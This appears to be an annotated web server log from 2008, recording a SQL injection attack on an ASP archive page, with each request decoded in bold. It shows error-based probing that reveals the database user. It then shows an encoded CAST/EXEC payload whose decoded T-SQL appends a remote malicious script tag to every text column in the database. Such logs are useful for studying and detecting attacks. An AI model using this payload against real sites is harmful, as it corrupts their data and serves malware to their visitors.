2008-03-08 13:37:12 http://www.someserver.com/dir1/archive.asp id=z%20ANd%20char(124)%2Buser%2Bchar(124)=0 202.101.*.* HTTP/1.1 Internet+Explorer+6.0 - - 200 0 17115 1171 
<br>
<b>id=z ANd |user|=0 </b><br>
<hr>
2008-03-08 13:37:13 http://www.someserver.com/dir1/archive.asp id=z%27%20ANd%20char(124)%2Buser%2Bchar(124)=0%20and%20%27%27=%27 202.101.*.* HTTP/1.1 Internet+Explorer+6.0 - - 200 0 17115 562
<br>
<b>id=z ANd |user|=0 and ''='</b><br>
<hr>
2008-03-08 13:37:13 http://www.someserver.com/dir1/archive.asp id=z%27%20ANd%20char(124)%2Buser%2Bchar(124)=0%20and%20%27%25%27=%27|33|80040e07|Syntax_error_converting_the_nvarchar_value_'|IUSR_Server|'_to_a_column_of_data_type_int. 202.101.*.* HTTP/1.1 Internet+Explorer+6.0 - - 500 0 292 390
<br>
<b>id=z ANd |user|=0 and '%'='</b><br>
<hr>
2008-03-08 13:37:15 http://www.someserver.com/dir1/archive.asp id=z;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300...7200%20AS%20NVARCHAR(4000));EXEC(@S);-- 202.101.*.* HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 17139 1421 <hr>
2008-03-08 13:37:25 http://www.someserver.com/dir1/archive.asp id=z';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300...7200%20AS%20NVARCHAR(4000));EXEC(@S);-- 202.101.*.* HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 0 10234
<br>
<b>DECLARE @T varchar(255),@C varchar(255) <br>
DECLARE Table_Cursor CURSOR FOR <br>
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) <br>
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C <br>
WHILE(@@FETCH_STATUS=0) BEGIN <br>
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''< script src=http://www.211796*.net/f****p.js></script>''') <br>
FETCH NEXT FROM  Table_Cursor INTO @T,@C <br>
END <br>
CLOSE Table_Cursor <br>
DEALLOCATE Table_Cursor</b><br>
<hr>